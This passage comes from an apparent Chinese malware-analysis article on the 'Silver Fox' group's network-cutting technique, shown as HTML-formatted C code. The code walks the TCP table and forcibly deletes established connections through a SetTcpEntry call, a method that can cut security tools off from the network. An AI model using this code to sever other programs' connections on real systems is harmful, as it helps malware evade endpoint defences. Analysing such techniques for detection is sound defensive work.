Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">==</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> MIB_TCP_STATE_ESTAB</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span><span leaf="">MIB_TCPROW2 rowToSet </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> row</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span><span leaf="">rowToSet</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwState </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> MIB_TCP_STATE_DELETE_TCB</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span><span leaf="">DWORD result </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> MySetTcpEntry</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">((</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">MIB_TCPROW_OWNER_PID</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">*)&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">row</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">result </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">==</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> NO_ERROR</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">                </span></span><span leaf="">closedCount</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">++;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">                </span></span><span leaf="">IN_ADDR localAddr </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> row</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwLocalAddr </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">};</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">                </span></span><span leaf="">IN_ADDR remoteAddr </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> row</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwRemoteAddr </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">};</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">                </span></span><span leaf="">wprintf</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;</span><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">[-] Closed TCP connection: %S:</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">%d</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> -&gt; %S:</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">%d\n</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">                    </span></span><span leaf="">inet_ntoa</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">localAddr</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">),</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> ntohs</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">((</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">u_short</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">row</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwLocalPort</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">),</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">                    </span></span><span leaf="">inet_ntoa</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">remoteAddr</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">),</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> ntohs</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">((</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">u_short</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">row</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwRemotePort</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">));</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim 